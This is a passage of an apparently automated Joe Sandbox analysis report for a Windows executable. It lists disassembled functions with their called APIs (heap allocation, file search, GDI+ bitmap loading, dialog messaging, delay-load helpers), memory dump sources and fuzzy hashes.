    • Opcode Fuzzy Hash: f3689ca2e0e90d32448c58402ad199024d5897693851a90e7fecc8f272bdcdbb
    • Instruction Fuzzy Hash: 7E214C71C04219AFDF25DF98D851EEEBBB4AF45304F0004AEE80AB7242E7756A45DB61
    Function 000B8823 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 000B8828
      • Part of subcall function 000BE298: __EH_prolog.LIBCMT ref: 000BE29D
      • Part of subcall function 000C33D4: __EH_prolog.LIBCMT ref: 000C33D9
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: 109ff24139cb342488cccc75f0031791979146f3d4b8cff9aafbd76daf11cc85
    • Instruction ID: a07b1997caf981dc65509a618558e2e7d2534e09925ae4ab07957b15f7cf4dc8
    • Opcode Fuzzy Hash: 109ff24139cb342488cccc75f0031791979146f3d4b8cff9aafbd76daf11cc85
    • Instruction Fuzzy Hash: CD210CB0A007449FD724DF6AC4856DBFBE5BF28300F40892EE59E93652D774A644CB91
    Function 000BE298 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 000BE29D
      • Part of subcall function 000B6891: __EH_prolog.LIBCMT ref: 000B6896
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: c08e0d1ce0317a59df2ff27088270f0f1faeb895c3819333dde910f065bdb36f
    • Instruction ID: 6679c5d4cdacfa61e6f1adc81045d7bd1c24f4597d3f2e685e63f65868b29db4
    • Opcode Fuzzy Hash: c08e0d1ce0317a59df2ff27088270f0f1faeb895c3819333dde910f065bdb36f
    • Instruction Fuzzy Hash: 32117371A042849ADB25E7B9D5467EEBAE8AF84300F14446DA446D3383DF789A04C761
    Function 000CEB92 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 000CEB97
      • Part of subcall function 000C197C: _wcslen.LIBCMT ref: 000C1992
      • Part of subcall function 000B8823: __EH_prolog.LIBCMT ref: 000B8828
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: H_prolog$_wcslen
    • String ID:
    • API String ID: 2838827086-0
    • Opcode ID: 71919c85323d2703cefc554b4b33d85e1ba46c808c166b24db4b054185a44669
    • Instruction ID: de3f0f0113b131252c7bf06e2d00d83a2fe2f1ec626e59e97728b3c1ef2526bf
    • Opcode Fuzzy Hash: 71919c85323d2703cefc554b4b33d85e1ba46c808c166b24db4b054185a44669
    • Instruction Fuzzy Hash: 9811C471608284DED715EB68EC06BDD7FA4EB15320F00806EF188936A3DBF51684CBA2
    Function 000DD629 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 000DC2E6: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,000DA533,00000001,00000364,?,000D53ED,?,?,000F30C4), ref: 000DC327
    • _free.LIBCMT ref: 000DD695
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AllocateHeap_free
    • String ID:
    • API String ID: 614378929-0
    • Opcode ID: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
    • Instruction ID: 7ad0865356296a408819772b0324a42a23b52c4df21efdf044e7cec0e0542964
    • Opcode Fuzzy Hash: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
    • Instruction Fuzzy Hash: 2B01D672204305ABE3218E65984599AFBDDEB99370F25051FE59893380EA30A805CA78
    Function 000DC2E6 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,000DA533,00000001,00000364,?,000D53ED,?,?,000F30C4), ref: 000DC327
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: 29b0a11800bd70c15b8245bfec7581d5c6f38448b22b25d48eb4ed46fb8b583c
    • Instruction ID: 8218433e9bc347ec2ae89566a6924ae77e6f768f532179fdfbe47c2e38ce52bb
    • Opcode Fuzzy Hash: 29b0a11800bd70c15b8245bfec7581d5c6f38448b22b25d48eb4ed46fb8b583c
    • Instruction Fuzzy Hash: C1F0B431604326A6FB751A269C45E9A37989F81B60B14C023F804E63A1DA20DA01D6B1
    Function 000B644D Relevance: 1.5, APIs: 1, Instructions: 39COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 000B6452
      • Part of subcall function 000C04E5: __EH_prolog.LIBCMT ref: 000C04EA
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: 8927fc1b09e7777eb206680d5c0ecf98d29f9cebe0dfbb870fbb659b55ede198
    • Instruction ID: ec5128284ccb52a3c917dffc889741889af5264c1ef48fbeff0f144ebac34082
    • Opcode Fuzzy Hash: 8927fc1b09e7777eb206680d5c0ecf98d29f9cebe0dfbb870fbb659b55ede198
    • Instruction Fuzzy Hash: C7018870800745DAD716EBA8C062BEEFBE4EF62300F10454FE06A63293CBB42B04C762
    Function 000DA7EE Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • RtlAllocateHeap.NTDLL(00000000,?,?,?,000D5584,?,0000015D,?,?,?,?,000D6A60,000000FF,00000000,?,?), ref: 000DA820
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: 8ec7b1749386737aa00ef4866b7d0829dc6399af7a8ad3c00de2b56e5676a8cf
    • Instruction ID: 0f58f23c529bafee05e754082a1308dbde8585f86335149422294467cc92d636
    • Opcode Fuzzy Hash: 8ec7b1749386737aa00ef4866b7d0829dc6399af7a8ad3c00de2b56e5676a8cf
    • Instruction Fuzzy Hash: C9E03931700321A6EA712A65AC05BAB3A89DF47BB0B154123EC0596392DF64CC03A6FB
    Function 000BB966 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 000BBA94: FindFirstFileW.KERNEL32(?,?,?,?,?,?,000BB98B,000000FF,?,?), ref: 000BBABD
      • Part of subcall function 000BBA94: FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,000BB98B,000000FF,?,?), ref: 000BBAEB
      • Part of subcall function 000BBA94: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,000BB98B,000000FF,?,?), ref: 000BBAF7
    • FindClose.KERNEL32(00000000,000000FF,?,?), ref: 000BB991
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Find$FileFirst$CloseErrorLast
    • String ID:
    • API String ID: 1464966427-0
    • Opcode ID: 38a6bfb92d08522d838d4580d8849c7089d92997e53394a0fa21ef2aa3e77789
    • Instruction ID: 795eae65a517ea739f4485f4d96c21efd93d8b6df1f3714b272a402bec9ac5d6
    • Opcode Fuzzy Hash: 38a6bfb92d08522d838d4580d8849c7089d92997e53394a0fa21ef2aa3e77789
    • Instruction Fuzzy Hash: BDF08232008790ABCA721BB848047CBBFD09F16335F048A49F2FE122D3C3B450959722
    Function 000C2121 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
    Download Yara Rule
    APIs
    • SetThreadExecutionState.KERNEL32(00000001), ref: 000C2156
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ExecutionStateThread
    • String ID:
    • API String ID: 2211380416-0
    • Opcode ID: 74f542093a7c33f3e6b9f8e53d8c3e534ccdc8a7fd75b693c24611a088637ce7
    • Instruction ID: 0d18e5cdcd4fadc54dfe708d74025718a38aa2017110eef7c6113e0fbd97d6ff
    • Opcode Fuzzy Hash: 74f542093a7c33f3e6b9f8e53d8c3e534ccdc8a7fd75b693c24611a088637ce7
    • Instruction Fuzzy Hash: 28D05B1571405052EA65377C6855FFD1B465FD2324F0C00BFB70D679D38F680987A2B1
    Function 000CB626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
    Download Yara Rule
    APIs
    • GdipAlloc.GDIPLUS(00000010), ref: 000CB62C
      • Part of subcall function 000CB3B8: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 000CB3D9
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Gdip$AllocBitmapCreateFromStream
    • String ID:
    • API String ID: 1915507550-0
    • Opcode ID: 67c6c0b1a9f8045d953eebf11179e7c179da5fb7bf356439fdf6af47a3be8cb5
    • Instruction ID: fac12225f89e2f36a063e6f953606c2194d53789eb241c07d8636da0108b0f2f
    • Opcode Fuzzy Hash: 67c6c0b1a9f8045d953eebf11179e7c179da5fb7bf356439fdf6af47a3be8cb5
    • Instruction Fuzzy Hash: ABD0A7302002097ADF416B21CC03FBE75959B10340F0080397C02C5181EBB1C9105A51
    Function 000CF737 Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • DloadProtectSection.DELAYIMP ref: 000CF75F
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: DloadProtectSection
    • String ID:
    • API String ID: 2203082970-0
    • Opcode ID: 1c30638d2cdfc0bf076241f4a9cae45be52c86da9dd2da7cba8f7aa05e1ab0f2
    • Instruction ID: 6803e008640798ff8c80b91e8f007b1d0bdef1c8bddd8f8aebeaa7f4570add89
    • Opcode Fuzzy Hash: 1c30638d2cdfc0bf076241f4a9cae45be52c86da9dd2da7cba8f7aa05e1ab0f2
    • Instruction Fuzzy Hash: ADD0C93050820A99DA59ABA4AE86FBC22A3F308768B804629B151D51A9C7744590D613
    Function 000CEEAD Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
    Download Yara Rule
    APIs
    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,000C2E78), ref: 000CEED2
      • Part of subcall function 000CC748: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 000CC759
      • Part of subcall function 000CC748: KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 000CC76A
      • Part of subcall function 000CC748: IsDialogMessageW.USER32(000103E6,?), ref: 000CC77E
      • Part of subcall function 000CC748: TranslateMessage.USER32(?), ref: 000CC78C
      • Part of subcall function 000CC748: DispatchMessageW.USER32(?), ref: 000CC796
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Message$CallbackDialogDispatchDispatcherItemPeekSendTranslateUser
    • String ID:
    • API String ID: 3453300979-0
    • Opcode ID: 2b9ae935fb37188d5ce9b7b89438403a6e5464d4b6a3f1ac23ff2df7d7ea018c
    • Instruction ID: 0b64a9a04221589ae701a9ae6719d1d13edd0f078bcf2a8ab432848229f3d4f1
    • Opcode Fuzzy Hash: 2b9ae935fb37188d5ce9b7b89438403a6e5464d4b6a3f1ac23ff2df7d7ea018c
    • Instruction Fuzzy Hash: 40D09E75145200AEEA012B51DE06F5E7AE2FFC9B08F004658B249740B2C6629E21AF02
    Function 000BAB1C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
    Download Yara Rule
    APIs
    • GetFileType.KERNEL32(000000FF,000BAA1E), ref: 000BAB28
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: FileType
    • String ID:
    • API String ID: 3081899298-0
    • Opcode ID: 1ac0fc47d12e0f205a3e259e275b65e0344aeb7b25cc51d13d66312c245c789b
    • Instruction ID: c9d178e928ca73fbd87bf7e7016efa4a613eb45d9eca2ade597abc34a2dc6492
    • Opcode Fuzzy Hash: 1ac0fc47d12e0f205a3e259e275b65e0344aeb7b25cc51d13d66312c245c789b
    • Instruction Fuzzy Hash: 6AC01234100205854EB00A2498448D57BA3AB533657B493A5C074C90A2C3268C43E502
    Function 000CF31B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 3a2c0690458da1f8ffa74d2a7c857356e3d20908d6ca9da9fe499e1b5af4d207
    • Instruction ID: 36789acab6b06ebe503dc4eb85c2397f1714f6f99a4e119009045446ade61a9f
    • Opcode Fuzzy Hash: 3a2c0690458da1f8ffa74d2a7c857356e3d20908d6ca9da9fe499e1b5af4d207
    • Instruction Fuzzy Hash: 8FB01291268043BD371823113E06F7E021EC3C0B10370403FF001E4082E8400D402033
    Function 000CF336 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 221f77944261d838b8204b7a86a4a91c9e7c15eb670422d209d06872ffb50b6c
    • Instruction ID: 568a48f71945c917cde203c45ec0e450be1b9d637b5f09a3a711c3fb3461b528
    • Opcode Fuzzy Hash: 221f77944261d838b8204b7a86a4a91c9e7c15eb670422d209d06872ffb50b6c
    • Instruction Fuzzy Hash: F1B012912A8443BC374863197F02F7E022EC3C0B10370423FF001D8082D8810E412033
    Function 000CF34A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
